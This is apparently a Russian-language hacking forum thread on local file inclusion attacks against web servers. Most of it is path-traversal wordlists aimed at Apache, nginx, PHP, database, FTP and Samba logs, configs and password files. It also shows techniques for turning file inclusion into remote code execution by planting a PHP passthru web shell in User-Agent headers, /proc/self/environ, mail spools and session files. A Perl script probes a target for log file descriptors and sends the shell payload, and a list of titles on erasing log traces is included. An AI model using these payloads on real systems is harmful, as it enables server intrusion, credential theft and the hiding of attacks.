Apache: *log Code: ../../../../../../../../../../../../var/log/httpd/access_log ../../../../../../../../../../../../var/log/httpd/error_log ../../../../../../../../../../var/log/httpd/access_log ../../../../../../../../../../var/log/httpd/error_log ../apache/logs/error.log ../apache/logs/access.log ../../apache/logs/error.log ../../apache/logs/access.log ../../../apache/logs/error.log ../../../apache/logs/access.log ../../../../apache/logs/error.log ../../../../apache/logs/access.log ../../../../../apache/logs/error.log ../../../../../apache/logs/access.log ../apache2/logs/error.log ../apache2/logs/access.log ../../apache2/logs/error.log ../../apache2/logs/access.log ../../../apache2/logs/error.log ../../../apache2/logs/access.log ../../../../apache2/logs/error.log ../../../../apache2/logs/access.log ../../../../../apache2/logs/error.log ../../../../../apache2/logs/access.log ../logs/error.log ../logs/access.log ../../logs/error.log ../../logs/access.log ../../../logs/error.log ../../../logs/access.log ../../../../logs/error.log ../../../../logs/access.log ../../../../../logs/error.log ../../../../../logs/access.log ../../../../../../../../../../etc/httpd/logs/acces_log ../../../../../../../../../../etc/httpd/logs/acces.log ../../../../../../../../../../etc/httpd/logs/error_log ../../../../../../../../../../etc/httpd/logs/error.log ../../../../../../../../../../usr/local/apache/logs/access_log ../../../../../../../../../../usr/local/apache/logs/access.log ../../../../../../../../../../usr/local/apache/logs/error_log ../../../../../../../../../../usr/local/apache/logs/error.log ../../../../../../../../../../usr/local/apache2/logs/access_log ../../../../../../../../../../usr/local/apache2/logs/access.log ../../../../../../../../../../usr/local/apache2/logs/error_log ../../../../../../../../../../usr/local/apache2/logs/error.log ../../../../../../../../../../var/www/logs/access_log ../../../../../../../../../../var/www/logs/access.log ../../../../../../../../../../var/www/logs/error_log ../../../../../../../../../../var/www/logs/error.log ../../../../../../../../../../var/log/httpd/access_log ../../../../../../../../../../var/log/httpd/access.log ../../../../../../../../../../var/log/httpd/error_log ../../../../../../../../../../var/log/httpd/error.log ../../../../../../../../../../var/log/apache/access_log ../../../../../../../../../../var/log/apache/access.log ../../../../../../../../../../var/log/apache/error_log ../../../../../../../../../../var/log/apache/error.log ../../../../../../../../../../var/log/apache2/access_log ../../../../../../../../../../var/log/apache2/access.log ../../../../../../../../../../var/log/apache2/error_log ../../../../../../../../../../var/log/apache2/error.log ../../../../../../../../../../var/log/access_log ../../../../../../../../../../var/log/access.log ../../../../../../../../../../var/log/error_log ../../../../../../../../../../var/log/error.log ../../../../../../../../../../opt/lampp/logs/access_log ../../../../../../../../../../opt/lampp/logs/error_log ../../../../../../../../../../opt/xampp/logs/access_log ../../../../../../../../../../opt/xampp/logs/error_log ../../../../../../../../../../opt/lampp/logs/access.log ../../../../../../../../../../opt/lampp/logs/error.log ../../../../../../../../../../opt/xampp/logs/access.log ../../../../../../../../../../opt/xampp/logs/error.log ../../../../../../../../../../Program Files\Apache Group\Apache\logs\access.log ../../../../../../../../../../Program Files\Apache Group\Apache\logs\error.log ../../../apache/logs/error.log ../../../apache/logs/access.log ../../../../apache/logs/error.log ../../../../apache/logs/access.log ../../../../../apache/logs/error.log ../../../../../apache/logs/access.log ../../../../../../apache/logs/error.log ../../../../../../apache/logs/access.log ../../../../../../../apache/logs/error.log ../../../../../../../apache/logs/access.log ../../../../../../../../apache/logs/error.log ../../../../../../../../apache/logs/access.log ../../../logs/error.log ../../../logs/access.log ../../../../logs/error.log ../../../../logs/access.log ../../../../../logs/error.log ../../../../../logs/access.log ../../../../../../logs/error.log ../../../../../../logs/access.log ../../../../../../../logs/error.log ../../../../../../../logs/access.log ../../../../../../../../logs/error.log ../../../../../../../../logs/access.log ../../../../../../../../../../../../etc/httpd/logs/acces_log ../../../../../../../../../../../../etc/httpd/logs/acces.log ../../../../../../../../../../../../etc/httpd/logs/error_log ../../../../../../../../../../../../etc/httpd/logs/error.log ../../../../../../../../../../../../var/www/logs/access_log ../../../../../../../../../../../../var/www/logs/access.log ../../../../../../../../../../../../usr/local/apache/logs/access_log ../../../../../../../../../../../../usr/local/apache/logs/access.log ../../../../../../../../../../../../var/log/apache/access_log ../../../../../../../../../../../../var/log/apache/access.log ../../../../../../../../../../../../var/log/access_log ../../../../../../../../../../../../var/www/logs/error_log ../../../../../../../../../../../../var/www/logs/error.log ../../../../../../../../../../../../usr/local/apache/logs/error_log ../../../../../../../../../../../../usr/local/apache/logs/error.log ../../../../../../../../../../../../var/log/apache/error_log ../../../../../../../../../../../../var/log/apache/error.log ../../../../../../../../../../../../var/log/access_log ../../../../../../../../../../../../var/log/error_log *conf Code: ../../../../../../usr/local/apache/conf/httpd.conf ../../../../../../usr/local/apache2/conf/httpd.conf ../../../../../../etc/httpd/conf/httpd.conf ../../../../../../etc/apache/conf/httpd.conf ../../../../../../usr/local/etc/apache/conf/httpd.conf ../../../../../../etc/apache2/httpd.conf ../../../../../../../../../usr/local/apache/conf/httpd.conf ../../../../../../../../../usr/local/apache2/conf/httpd.conf ../../../../../../../../usr/local/apache/httpd.conf ../../../../../../../../usr/local/apache2/httpd.conf ../../../../../../../../usr/local/httpd/conf/httpd.conf ../../../../../../../usr/local/etc/apache/conf/httpd.conf ../../../../../../../usr/local/etc/apache2/conf/httpd.conf ../../../../../../../usr/local/etc/httpd/conf/httpd.conf ../../../../../../../usr/apache2/conf/httpd.conf ../../../../../../../usr/apache/conf/httpd.conf ../../../../../../../usr/local/apps/apache2/conf/httpd.conf ../../../../../../../usr/local/apps/apache/conf/httpd.conf ../../../../../../etc/apache/conf/httpd.conf ../../../../../../etc/apache2/conf/httpd.conf ../../../../../../etc/httpd/conf/httpd.conf ../../../../../../etc/http/conf/httpd.conf ../../../../../../etc/apache2/httpd.conf ../../../../../../etc/httpd/httpd.conf ../../../../../../etc/http/httpd.conf ../../../../../../etc/httpd.conf ../../../../../opt/apache/conf/httpd.conf ../../../../../opt/apache2/conf/httpd.conf ../../../../var/www/conf/httpd.conf ../../../private/etc/httpd/httpd.conf ../../../private/etc/httpd/httpd.conf.default ../../Volumes/webBackup/opt/apache2/conf/httpd.conf ../../Volumes/webBackup/private/etc/httpd/httpd.conf ../../Volumes/webBackup/private/etc/httpd/httpd.conf.default ../../../../../../../../../Program Files\Apache Group\Apache\conf\httpd.conf ../../../../../../../../../Program Files\Apache Group\Apache2\conf\httpd.conf ../../../../../../../../../Program Files\xampp\apache\conf\httpd.conf ../../../../../../../../../usr/local/php/httpd.conf.php ../../../../../../../../../usr/local/php4/httpd.conf.php ../../../../../../../../../usr/local/php5/httpd.conf.php ../../../../../../../../../usr/local/php/httpd.conf ../../../../../../../../../usr/local/php4/httpd.conf ../../../../../../../../../usr/local/php5/httpd.conf ../../../../../../../../../Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf ../../../../../../../../../Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf ../../../../../../../../../Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf ../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php ../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php ../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php /usr/local/etc/apache/vhosts.conf php.ini Code: ../../../../../../../../../etc/php.ini ../../../../../../../../../bin/php.ini ../../../../../../../../../etc/httpd/php.ini ../../../../../../../../../usr/lib/php.ini ../../../../../../../../../usr/lib/php/php.ini ../../../../../../../../../usr/local/etc/php.ini ../../../../../../../../../usr/local/lib/php.ini ../../../../../../../../../usr/local/php/lib/php.ini ../../../../../../../../../usr/local/php4/lib/php.ini ../../../../../../../../../usr/local/php5/lib/php.ini ../../../../../../../../../usr/local/apache/conf/php.ini ../../../../../../../../../etc/php4.4/fcgi/php.ini ../../../../../../../../../etc/php4/apache/php.ini ../../../../../../../../../etc/php4/apache2/php.ini ../../../../../../../../../etc/php5/apache/php.ini ../../../../../../../../../etc/php5/apache2/php.ini ../../../../../../../../../etc/php/php.ini ../../../../../../../../../etc/php/php4/php.ini ../../../../../../../../../etc/php/apache/php.ini ../../../../../../../../../etc/php/apache2/php.ini ../../../../../../../../../web/conf/php.ini ../../../../../../../../../usr/local/Zend/etc/php.ini ../../../../../../../../../opt/xampp/etc/php.ini ../../../../../../../../../var/local/www/conf/php.ini ../../../../../../../../../etc/php/cgi/php.ini ../../../../../../../../../etc/php4/cgi/php.ini ../../../../../../../../../etc/php5/cgi/php.ini ../../../../../../../../../php5\php.ini ../../../../../../../../../php4\php.ini ../../../../../../../../../php\php.ini ../../../../../../../../../PHP\php.ini ../../../../../../../../../WINDOWS\php.ini ../../../../../../../../../WINNT\php.ini ../../../../../../../../../apache\php\php.ini ../../../../../../../../../xampp\apache\bin\php.ini ../../../../../../../../../NetServer\bin\stable\apache\php.ini ../../../../../../../../../home2\bin\stable\apache\php.ini ../../../../../../../../../home\bin\stable\apache\php.ini ../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/lib/php.ini Cpanel: *log /usr/local/cpanel/logs /usr/local/cpanel/logs/stats_log /usr/local/cpanel/logs/access_log /usr/local/cpanel/logs/error_log /usr/local/cpanel/logs/license_log /usr/local/cpanel/logs/login_log /usr/local/cpanel/logs/stats_log *conf /var/cpanel/cpanel.config MySQL: *log /var/log/mysql/mysql-bin.log /var/log/mysql.log /var/log/mysqlderror.log /var/log/mysql/mysql.log /var/log/mysql/mysql-slow.log /var/mysql.log *conf /var/lib/mysql/my.cnf /etc/mysql/my.cnf /etc/my.cnf MySQL(Windows): *log Code: C:\Program Files\MySQL\MySQL Server 5.0\data\hostname.err C:\Program Files\MySQL\MySQL Server 5.0\data\mysql.log C:\Program Files\MySQL\MySQL Server 5.0\data\mysql.err C:\Program Files\MySQL\MySQL Server 5.0\data\mysql-bin.log C:\Program Files\MySQL\data\hostname.err C:\Program Files\MySQL\data\mysql.log C:\Program Files\MySQL\data\mysql.err C:\Program Files\MySQL\data\mysql-bin.log C:\MySQL\data\hostname.err C:\MySQL\data\mysql.log C:\MySQL\data\mysql.err C:\MySQL\data\mysql-bin.log *conf Code: C:\Program Files\MySQL\MySQL Server 5.0\my.ini C:\Program Files\MySQL\MySQL Server 5.0\my.cnf C:\Program Files\MySQL\my.ini C:\Program Files\MySQL\my.cnf C:\MySQL\my.ini C:\MySQL\my.cnf Mod Security: *log /usr/local/apache/logs/audit_log /logs/security_debug_log /logs/security_log *conf /usr/local/apache/conf/modsec.conf FTP: ProFTPD: *log /etc/logrotate.d/proftpd /www/logs/proftpd.system.log /var/log/proftpd *conf /etc/proftp.conf /etc/protpd/proftpd.conf /etc/vhcs2/proftpd/proftpd.conf /etc/proftpd/modules.conf vsftpd: *log /var/log/vsftpd.log /etc/vsftpd.chroot_list /etc/logrotate.d/vsftpd.log *conf /etc/vsftpd/vsftpd.conf /etc/vsftpd.conf /etc/chrootUsers wu-ftpd: *log /var/log/xferlog /var/adm/log/xferlog *conf /etc/wu-ftpd/ftpaccess /etc/wu-ftpd/ftphosts /etc/wu-ftpd/ftpusers Pure-FTPd: *conf /usr/sbin/pure-config.pl /usr/etc/pure-ftpd.conf /etc/pure-ftpd/pure-ftpd.conf /usr/local/etc/pure-ftpd.conf /usr/local/etc/pureftpd.pdb /usr/local/pureftpd/etc/pureftpd.pdb /usr/local/pureftpd/sbin/pure-config.pl /usr/local/pureftpd/etc/pure-ftpd.conf -/etc/pure-ftpd.conf /etc/pure-ftpd/pure-ftpd.pdb /etc/pureftpd.pdb /etc/pureftpd.passwd /etc/pure-ftpd/pureftpd.pdb DragonflyBSD & FreeBSD: /usr/ports/ftp/pure-ftpd/ OpenBSD: /usr/ports/net/pure-ftpd/ NetBSD: /usr/pkgsrc/net/pureftpd/ Crux Linux: /usr/ports/contrib/pure-ftpd/ *log /var/log/pure-ftpd/pure-ftpd.log /logs/pure-ftpd.log /var/log/pureftpd.log Other: /var/log/ftp-proxy/ftp-proxy.log /var/log/ftp-proxy /var/log/ftplog /etc/logrotate.d/ftp /etc/ftpchroot /etc/ftphosts Mail server:Exim: *log /var/log/exim_mainlog /var/log/exim/mainlog /var/log/maillog /var/log/exim_paniclog /var/log/exim/paniclog /var/log/exim/rejectlog /var/log/exim_rejectlog Информация к размышлению: - Выполнение команд через локальный инклюд - Логи для умных - ЗАМЕТАЕМ СЛЕДЫ В LINUX - Скажи логам нет! - В борьбе с журнальными бестиями - Боремся с логами в *nix - Боремся с логами в *nix #2 - Бортжурнал юниксоида - О взломе лог файлов thx [53x]Shadow
В аттаче - элементарная утилитка для проверки GET инклудов. Если у вас есть РАСПРОСТРАНЕННЫЙ ПУТЬ отстуствующий в списке - запостите его.
Значит, помниццо были разговоры про то что при инклуде логов возникают проблемы и т.п. В error_log часто пишется "Referer". В access_log - "User-Agent". И касательно мифа по тому что символы < > кодируюццо в URL аналоги и "ничего не сделаешь" - запустите любой http-снифер и вы увидите, что это браузер виноват - он автоматом переводит символы в урл. Просто пошлите пакет любой тулзой типа AccessDriver.
... Code: ../../../../../../usr/local/apache/bin/httpd ../../../../../../../../../usr/local/apache/conf/httpd.conf.default ../../../../../../../../etc/httpd/logs/access_log ../../../../../../../../etc/httpd/logs/access.log ../../../../../../../../../usr/local/apache/conf/access.conf
MuddleFTPD *log Code: /var/log/muddleftpd /usr/sbin/mudlogd /etc/muddleftpd/mudlog *conf Code: /etc/muddleftpd.com /etc/muddleftpd/mudlogd.conf /etc/muddleftpd/muddleftpd.conf /var/log/muddleftpd.conf /usr/sbin/mudpasswd /etc/muddleftpd/muddleftpd.passwd /etc/muddleftpd/passwd
В большенстве случаев сервер под управлением Win NT хранит свои лог файлы в следующих директориях: HTTP: %SystemRoot%\system32\logfiles\W3SVC#(W3SVC1,W3SVC2,W3SVC3...)\ FTP: %SystemRoot%\system32\logfiles\MSFTPSVC#(MSFTPSVC4,MSFTPSVC5...)\ SMTP: %SystemRoot%\system32\logfiles\SMTPSVC#(SMTPSVC1,SMTPSVC2...)\ # -обозначает номер веб-сайта(номер узла) (по умолчанию равен "1") Имя файла соответствует его дате создания: in02039.log (2002 9-ое марта) Примечание по типам журнулов: IIS аббревиатурой служит "in" W3C аббревиатурой служит "ex" NCSA аббревиатурой служит "nc" Отчёты стандартного Firewall'а: %SystemRoot%\system32\logfiles\Firewall\pfirewall.log %SystemRoot%\system32\logfiles\Firewall\pfirewall.log.old
lighthttpd *log /var/log/lighttpd.error.log /var/log/lighttpd.access.log /var/lighttpd.log /var/logs/access.log /var/log/lighttpd/ /var/log/lighttpd/error.log /var/log/lighttpd/access.www.log /var/log/lighttpd/error.www.log /var/log/lighttpd/access.log /usr/local/apache2/logs/lighttpd.error.log /usr/local/apache2/logs/lighttpd.log /usr/local/apache/logs/lighttpd.error.log /usr/local/apache/logs/lighttpd.log /var/log/lighttpd.access.log /var/log/lighttpd.error.log /usr/local/lighttpd/log/lighttpd.error.log /usr/local/lighttpd/log/access.log /var/log/lighttpd/mydomain/access.log /var/log/lighttpd/mydomain/error.log /usr/home/user/var/log/lighttpd.error.log /usr/home/user/var/log/apache.log *conf /home/user/lighttpd/lighttpd.conf /usr/home/user/lighttpd/lighttpd.conf /etc/lighttpd/lighthttpd.conf /usr/local/etc/lighttpd.conf /usr/local/lighttpd/conf/lighttpd.conf /usr/local/etc/lighttpd.conf.new /var/www/.lighttpdpassword Samba*conf /etc/smbpasswd /etc/smb.conf /etc/samba/smb.conf /etc/samba/samba.conf /etc/samba/smb.conf.user /etc/samba/smbpasswd /etc/samba/smbusers /etc/samba/private/smbpasswd /etc/samba/smb.conf.198.166.0.5 /usr/local/samba/lib/smb.conf.198.166.0.5 /usr/local/etc/smb.conf /usr/local/samba/lib/smb.conf.user /daten/home/gr-user *log /usr/local/samba/lib/log.user /usr/local/logs/samba.log /usr/local/samba/lib/log.198.166.0.5 /var/log/samba/log.smbd /var/log/samba/log.nmbd /var/log/samba.log /var/log/samba.log1 /var/log/samba.log2 /var/log/samba/samba_198.166.0.5.log /var/log/samba/198.166.0.5.log /var/log/samba.198.166.0.5 /var/log/samba.log.198.166.0.5 /var/log/samba/198.166.0.5 /var/log/log.smb /var/log/samba-log.198.166.0.5 /etc/samba/netlogon
PostgreSQL *log /var/postgresql/log/postgresql.log /var/log/postgresql/postgresql.log /var/log/postgres/pg_backup.log /var/log/postgres/postgres.log /var/log/postgresql.log /var/log/pgsql/pgsql.log /var/log/postgresql/postgresql-8.1-main.log /var/log/pgsql8.log /var/log/postgresql/postgres.log /var/log/pgsql_log /var/log/postgresql/main.log /var/log/cron /var/log/postgres.log /usr/internet/pgsql/data/postmaster.log /usr/local/pgsql/data/postgresql.log /usr/local/pgsql/data/pg_log c:\PostgreSQL\log\pgadmin.log *conf /var/lib/pgsql/data/postgresql.conf /var/postgresql/db/postgresql.conf /var/nm2/postgresql.conf /usr/local/pgsql/data/postgresql.conf /usr/local/pgsql/data/pg_hba.conf /usr/internet/pgsql/data/pg_hba.conf /usr/local/pgsql/data/passwd /usr/local/pgsql/bin/pg_passwd /etc/postgresql/postgresql.conf /etc/postgresql/pg_hba.conf /home/postgres/data/postgresql.conf /home/postgres/data/PG_VERSION /home/postgres/data/pg_ident.conf /home/postgres/data/pg_hba.conf Error Reporting and Logging
ipfw (BSD) *log /var/log/ipfw.log /var/log/ipfw /var/log/ipfw/ipfw.log /var/log/ipfw.today *conf /etc/ipfw.rules /etc/ipfw.conf /etc/firewall.rules
*обновление постов. Структура архива: _all_apache.log.txt _all_httpd.conf.txt _all_log.txt -LAMPP, XAMPP, Apache. _all_php.ini.txt _all_mysql.txt _all_mysql_win.txt _all_cpanel.txt _all_modsecurity.txt _all_ftp.txt -ProFTPD, vsftpd, wu-ftpd,Pure-FTPd, MuddleFTPD. _all_samba.txt _all_lighthttpd.txt _all_postgresq.txt
1) юзаем логи, не зная к ним пути a. /proc/%{PID}/fd/%{FD_ID} %{PID} - пид %{FD_ID} - ярлыки, (1,2,3,..,9) 2 и 7 логи апача (не факт что всегда, у меня были тоже 2 и 7) /proc/self/status - смотрим пид /proc/%{PID}/fd/%{FD_ID} -> /proc/3661/fd/2 index.php?inc=../../../../../proc/3661/fd/2 User-Agent: <?php passthru($_GET['cmd']) ?> Code: dr-x------ 2 www-data www-data 0 Jan 2 18:27 . dr-xr-xr-x 6 www-data www-data 0 Jan 2 18:27 .. lr-x------ 1 www-data www-data 64 Jan 2 18:27 0 -> /dev/null l-wx------ 1 www-data www-data 64 Jan 2 18:27 1 -> pipe:[3113414] l-wx------ 1 www-data www-data 64 Jan 2 18:27 2 -> /var/log/apache2/error.log lrwx------ 1 www-data www-data 64 Jan 2 18:27 3 -> socket:[2714910] lr-x------ 1 www-data www-data 64 Jan 2 18:27 4 -> pipe:[2714921] l-wx------ 1 www-data www-data 64 Jan 2 18:27 5 -> pipe:[2714921] l-wx------ 1 www-data www-data 64 Jan 2 18:27 6 -> /var/log/apache2/access.log lrwx------ 1 www-data www-data 64 Jan 2 18:27 7 -> /anon_inode:[eventpoll] lrwx------ 1 www-data www-data 64 Jan 2 18:27 8 -> socket:[2742717] lr-x------ 1 www-data www-data 64 Jan 2 18:27 9 -> /proc/27262/fd b. напрямую index.php?inc=../../../../../proc/self/fd/2 User-Agent: <?php passthru($_GET['cmd']) ?> 2) переменные окружения (если неправильно понял - поправьте) index.php?inc=../../../../../proc/self/environ POST: User-Agent: <?php passthru($_GET['cmd']) ?> 3) mail PHP: <? mail("ololo@localhost", "<?php passthru(\$_GET['cmd']) ?>", "fuckme"); ?> index.php?inc=../../../../../var/mail/ololo index.php?inc=../../../../../var/spool/mail/ololo зы. /proc/version /proc/self/cmdline /proc/devices по мотивам Code: http://www.ush.it/2008/08/18/lfi2rce-local-file-inclusion-to-remote-code-execution-advanced-exploitation-proc-shortcuts/ http://www.milw0rm.com/papers/260 http://itbloggen.se/cs/blogs/secteam/archive/2009/01/26/alternative-ways-to-exploit-PHP-remote-file-include-vulnerabilities.aspx
Скрипт для поиска путей логов Apache Code: #! /usr/bin/perl # perl script to serach apache logs path # Example: # URL: http://site/index.php # Variable: file # Method: POST # # by Pepelux (pepelux[at]enye-sec[dot]org) use LWP::UserAgent; $ua = LWP::UserAgent->new; my ($host, $var, $method) = @ARGV ; unless($ARGV[2]) { print "Usage: perl $0 <url> <vulnerable_var> <method>\n"; print "\tex: perl $0 http://site.com/index.php file GET\n"; print "\tex: perl $0 http://site.com/index.php file POST\n\n"; exit 1; } $ua->agent("<? passthru(\$_GET[cmd]) ?>"); $ua->timeout(10); $host = "http://".$host if ($host !~ /^http:/); if ($method =~ /GET/) { $url = $host."?".$var."=../../../../proc/self/stat%00"; $req = HTTP::Request->new(GET => $url); $req->header('Accept' => 'text/html'); } else { $req = HTTP::Request->new(POST => $host); $req->content_type('application/x-www-form-urlencoded'); $req->content($var."=../../../../proc/self/stat%00"); } $res = $ua->request($req); if ($res->is_success) { $result = $res->content; $result =~ s/<[^>]*>//g; $x = index($result, " ", 0); $pid = substr($result, 0, $x); print "Apache PID: ".$pid."\n"; } if ($method =~ /GET/) { $url = $host."?".$var."=../../../../proc/self/status%00"; $req = HTTP::Request->new(GET => $url); $req->header('Accept' => 'text/html'); } else { $req = HTTP::Request->new(POST => $host); $req->content_type('application/x-www-form-urlencoded'); $req->content($var."=../../../../proc/self/status%00"); } $res = $ua->request($req); if ($res->is_success) { $result = $res->content; $result =~ s/<[^>]*>//g; $x = index($result, "FDSize",0)+8; $fdsize = substr($result, $x, 3); print "FD_SIZE: ".$fdsize."\n"; } for ($cont = 0; $cont < $fdsize; $cont++) { $file = "../../../../proc/".$pid."/fd/".$cont; open FILE, $file; while(<FILE>) { if (($_ =~ /does not exist/) && ($_ =~ /passthru/)) { print "FD: ".$cont."\n"; exit; } } }
немного проверил то что c411k написал - mail файл доступен только юзеру чей mail, так что чтоб прочитать нужен и апач под тем же юзером, всяким www,nobody,apache запрещается по дефолту иметь ящик, /proc/self/environ у меня пустой , не знаю как будет при php в cgi моде, лог файлы да читаются на ура только если прав хватит, проверил на других хостах - только рут может логи читать (, потом еще через файл сессии можно инклуд сделать у меня он находится в /proc/self/fd/10
Рассмотрим ситуацию, когда уникальному пользователю присваивается SID (Session IDentifier) идентификатор, без какой либо фильтрации входящего содержимого, Независимо от его способа передачи(Cookie/Query string), на сервере будет создан "файл сеанса", при условии что session.save_handler соответствует значение files, в каталоге определенной директивой session.save_path. Главным плюсом является то, что обслуживание хостов на сервере будет производится одним процессом. Session.save_path: /tmp/sess_<session_id> /php_sess/sess_<session_id> /tmp/php-sess/sess_<session_id> /home/%username%/tmp/sess_<session_id> ../../../../tmp/sess_7083093d3b1e818d5c86c79b0f62a374&cmd=id
osx httpd conf /etc/osxhttpd/osxhttpd.conf /System/Library/WebObjects/Adaptors/Apache2.2/apache.conf osx site conf /etc/apache2/sites/*.conf" /etc/httpd/sites/000[1...]_[IP]_[PORT]_[SITE_NAME].conf Пример: 0002_18.80.2.252_80_meche.mit.edu.conf default site dir /Library/WebServer/Documents/ Webmin conf /usr/local/etc/webmin/miniserv.conf /etc/webmin/miniserv.conf /usr/local/etc/webmin/miniserv.users /etc/webmin/miniserv.users log /var/log/webmin/miniserv.log
SquirrelMail *log /usr/share/squirrelmail/plugins/squirrel_logger/setup.php $sl_logfile = "/var/log/squirrelmail.log"; /var/log/apache2/squirrelmail.log /var/log/apache2/squirrelmail.err.log /var/lib/squirrelmail/prefs/squirrelmail.log /var/log/squirrelmail.log /var/log/mail.log ls: #ls /usr/local/squirrelmail/www/ Code: AUTHORS configure doc include plugins src ChangeLog contrib functions index.php po themes class COPYING help INSTALL README UPGRADE config data images locale ReleaseNotes # ls /var/local/squirrelmail/ Code: attach data # ls /etc/squirrelmail/ Code: apache.conf config_local.php default_pref index.php config_default.php config.php filters_setup.php sqspell_config.php *conf /etc/squirrelmail/config/config.php /etc/squirrelmail/config.php /etc/httpd/conf.d/squirrelmail.conf /usr/share/squirrelmail/config/config.php /private/etc/squirrelmail/config/config.php /srv/www/htdos/squirrelmail/config/config.php /var/www/squirrelmail/config/config.php /var/www/html/squirrelmail/config/config.php /var/www/html/squirrelmail[Version]/config/config.php (/var/www/html/squirrelmail-1.2.9/config/config.php) Plugin /etc/squirrelmail/plugins /usr/share/squirrelmail/plugins /usr/share/squirrelmail/config/config.php $plugins[1] = 'squirrel_logger'; $plugins[2] ...
насколько я понял выполнить код через /proc/self/environ получиться только если php работает как cgi, иначе /proc/self/environ будет указываеть на окружение апача. Проверить легко, если в /proc/self/cmdline что-то вроде Code: /usr/sbin/apache2�-k�start� то php не cgi и код внедрить в /proc/self/environ не получиться.
Небольшое дополнение к материалу предоставленному c411k 1 На фре это работать не будет. там немного по другому всё устроено и по умолчанию proc/ не используется. 2 Через пиды искать логи бесполезно, да и не нужно, дело в том, что proc/self/ это как раз ссылка на каталог с данными процесса, а proc/self/fd в свою очередь дирректория содержащая ссылки на файлы которые использует процесс. Так-что всё проще. ============================= И так-же по дефолтным логам добывлю из своих наблюдений На Апаче 2.2.x частенько попадаются директории apache22/ т.е. и т.д.
nginx *.conf: Code: ../../../../../../etc/nginx/srv.d/*.conf ../../../../../../etc/nginx/nginx.conf ../../../../../../usr/local/etc/nginx/nginx.conf ../../../../../../usr/local/nginx/conf/nginx.conf logs: Code: ../../../../../../var/log/nginx/access_log ../../../../../../var/log/nginx/error_log ../../../../../../var/log/nginx/access.log ../../../../../../var/log/nginx/error.log ../../../../../../var/log/nginx.access_log ../../../../../../var/log/nginx.error_log ../../../../../../logs/access_log ../../../../../../logs/error_log ../../../../../../logs/access.log ../../../../../../logs/error.log ../../../../../../var/www/<domain.com>/log/nginx.access.log ../../../../../../var/www/<domain.com>/log/nginx.error.log ../../../../../../var/www/<domain.com>/log/nginx.access_log ../../../../../../var/www/<domain.com>/log/nginx.error_log ../../../../../../var/log/nginx/<domain.com>.access.log ../../../../../../var/log/nginx/<domain.com>.error.log ../../../../../../var/log/nginx/<domain.com>_access.log ../../../../../../var/log/nginx/<domain.com>_error.log
